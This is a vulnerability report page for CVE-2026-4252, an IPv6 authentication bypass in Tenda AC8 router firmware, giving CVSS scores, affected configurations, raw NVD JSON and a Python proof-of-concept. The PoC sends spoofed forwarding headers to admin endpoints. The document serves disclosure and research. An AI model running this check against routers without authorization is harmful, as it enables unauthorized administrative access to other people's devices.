Security Vulnerability Report
CVE-2026-4252 CVSS 9.8 CRITICAL

Published: 2026-03-16 17:16:32
Last Modified: 2026-04-03 19:39:22

Description

A vulnerability was identified in Tenda AC8 16.03.50.11. Affected by this issue is the function check_is_ipv6 of the component IPv6 Handler. The manipulation leads to reliance on IP address for authentication. It is possible to initiate the attack remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ac8_firmware:16.03.50.11:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:ac8:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda AC8 16.03.50.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-4252 - Tenda AC8 IPv6 Authentication Bypass PoC
Reference: https://github.com/digitalandrew/tenda_ac8_v5/blob/main/poc_ipv6_auth_bypass.py
"""
import socket
import struct
import requests


def create_ipv6_address():
    """Generate IPv6 address for bypass attempt"""
    # Use link-local IPv6 address format
    return "fe80::1"


def check_vulnerability(target_ip, target_port=80):
    """Check if target is vulnerable to CVE-2026-4252"""
    ipv6_addr = create_ipv6_address()

    # Craft HTTP request with spoofed IPv6 source address
    headers = {
        'X-Forwarded-For': ipv6_addr,
        'X-Real-IP': ipv6_addr,
        'X-IPv6': ipv6_addr,
        'User-Agent': 'Mozilla/5.0'
    }

    # Try to access admin endpoint without authentication
    urls = [
        f"http://{target_ip}/admin/",
        f"http://{target_ip}/cgi-bin/",
        f"http://{target_ip}/goform/"
    ]

    for url in urls:
        try:
            response = requests.get(url, headers=headers, timeout=5)
            if response.status_code == 200 and 'login' not in response.text.lower():
                print(f"[+] Potential vulnerability detected at {url}")
                print(f"[+] Response length: {len(response.text)}")
                return True
        except requests.RequestException as e:
            print(f"[-] Request failed: {e}")

    return False


if __name__ == "__main__":
    import sys

    if len(sys.argv) < 2:
        print("Usage: python poc.py <target_ip>")
        sys.exit(1)

    target = sys.argv[1]
    print(f"[*] Testing CVE-2026-4252 on {target}")
    check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4252", "sourceIdentifier": "[email protected]", "published": "2026-03-16T17:16:32.057", "lastModified": "2026-04-03T19:39:21.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Tenda AC8 16.03.50.11. Affected by this issue is the function check_is_ipv6 of the component IPv6 Handler. The manipulation leads to reliance on ip address for authentication. It is possible to initiate the attack remotely. The exploit is publicly available and might be used."}, {"lang": "es", "value": "Una vulnerabilidad fue identificada en Tenda AC8 16.03.50.11. Afectada por este problema es la función check_is_ipv6 del componente Gestor IPv6. La manipulación conduce a la dependencia de la dirección IP para la autenticación. Es posible iniciar el ataque remotamente. El exploit está disponible públicamente y podría ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "baseScore": 10.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-291"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ac8_firmware:16.03.50.11:*:*:*:*:*:*:*", "matchCriteriaId": "3744DBBC-5138-4CCE-8C19-9F807AE34304"}]}, {"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ac8:-:*:*:*:*:*:*:*", "matchCriteriaId": "C81F1E48-0204-4478-A937-5D40CDD9E5E4"}]}]}], "references": [{"url": "https://github.com/digitalandrew/tenda_ac8_v5/blob/main/poc_ipv6_auth_bypass.py", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://vuldb.com/?ctiid.351210", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.351210", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.771759", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}]}}